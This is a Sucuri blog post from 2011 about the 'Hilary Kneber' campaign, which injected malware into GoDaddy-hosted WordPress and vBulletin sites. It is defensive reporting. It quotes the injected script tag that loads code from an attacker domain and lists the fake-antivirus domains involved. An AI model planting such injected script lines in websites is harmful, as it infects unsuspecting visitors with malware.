• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Hilary Kneber Strikes Again – welcometotheglobalisnet

February 19, 2011David Dede

FacebookTwitterSubscribe

It seems that after a few months quiet, the “Hilary Kneber” group is back at it again. Their latest approach is very typical of Hilary Kneber style attacks affecting GoDaddy shared hosts. Basically they modify every PHP file and the database to make sure every page in the infected site is loading malware.

Today, we’ve started to see various WordPress sites infected with the following malware:

<script src "http://welcometotheglobalisnet.com/js.php?kk=25′></script>

Update 1: We are seeing some Vbulletin forums with the database infected. So it is not restricted to WordPress.
Update 2: If you need help cleaning up your site, we can do it for you: http://sucuri.net/signup

Which infects every post in the WordPress database and also modifies all PHP files to generate the above code. Note that the domain is not blacklisted yet so the risk is very high for everyone visiting an infected site.

What happens when someone clicks an infected site?

What the malware does is very simple, it contacts a few domains:

www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc

That will then try to infect the visitor via their browser (with a fake anti virus). We are still analyzing the infected sites, and we’ll post more details as they’re discovered.

Here is the whois for the group responsible:

Registrant Contact:
HardSoft, inc
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Administrative Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

Technical Contact:
Hilary Kneber anatoliy@tom.com
7569468 fax: 7569468
29/2 Sun street. Montey 29
Virginia NA 3947
us

If your site is infected with malware and you need help, visit Sucuri, we’ll get you cleaned up.

FacebookTwitterSubscribe

Categories: Web Pros, Website Malware Infections, WordPress SecurityTags: Hacked Websites, Malware Updates

About David Dede

David is a Security Researcher at Sucuri. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.

Reader Interactions

Comments

  1. Blkcatgal

    February 20, 2011

    How does one prevent them from infecting your site?? My site is hosted at GoDaddy. Is there anything I can do to protect my site from getting infected? (It’s been infected in the past.)

    • rvtraveller

      February 20, 2011

      Do what I did: Change hosts. I got tired of GoDaddy giving me crap about how it was my site’s software and scripts that was causing it to happen and moved to HostGator. Hasn’t happened to my site since (but has infected GoDaddy, in fact it happened right after I transferred and GoDaddy copy of my site was infected, HostGator copy was not).

      • Blkcatgal

        February 20, 2011

        I’ve been planning to do this…guess I better quit procrastinating and do it!!

        • carlos

          February 22, 2011

          Yes…. I am done with GoDaddy. Moving this week

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.